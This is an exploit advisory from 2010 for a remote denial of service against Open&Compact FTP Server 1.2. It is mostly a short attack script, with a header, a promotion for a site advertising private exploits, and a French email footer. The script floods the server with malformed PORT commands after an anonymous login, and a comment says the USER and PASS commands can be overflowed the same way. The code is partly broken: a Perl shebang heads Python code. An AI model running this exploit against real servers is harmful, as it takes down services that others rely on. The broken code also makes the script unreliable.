============================================================================= # Tilte: Open&Compact Ftp Server 1.2 "PORT" command Remote Denial of Service. ============================================================================= # Date....................: [22-05-2010]# Author..................: [Ma3sTr0-Dz]# Location ...............: [Algeria]# Software ...............: [Open&Comapct Ftp Server 1.2 "PORT" command Remote Denial of Service]# Impact..................: [Remote]# Site Software ..........: [http://sourceforge.net/projects/open-ftpd/]# Sptnx ..................: [CmOs_CLR & Sec4ever Memberz.]# Home : .................: [Www.Sec4ever.Com/home/ For Latest 2010 Localz & priv8 Exploits !]# Contact me : ...........: [o5m@hotmail.de] # Vulnerability: Remote Denial of service . # Part ExplOit & Bug Codes : --- #!/usr/bin/perl import socket print '---------------------------------------------------------------------' print ' Open&Compact Ftp Server 1.2 "PORT" command Remote Denial of Service' print ' url: http://sourceforge.net/projects/open-ftpd' print ' author: Ma3sTr0-Dz' print ' mail: o5m@hotmail.de' print ' site: www.sec4ever.com' print ' USER and PASS methods are vulnerable too, just pass "A: " * 1000' print ' as buffer' print '---------------------------------------------------------------------' buffer = "A" * 5 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("",21)) s.send('USER %s\r\n' % "anonymous") for i in range(1,31): s.send('PORT %s\n\n' % buffer) print "Sending request n. " + str(i) --- Don't Forget : Www.Sec4ever.Com/home [ Class it in favoris for more surprices ] _________________________________________________________________ Votre messagerie et bien plus où que vous soyez. Passez à Windows Live Hotmail, c'est gratuit ! https://signup.live.com/signup.aspx?id=60969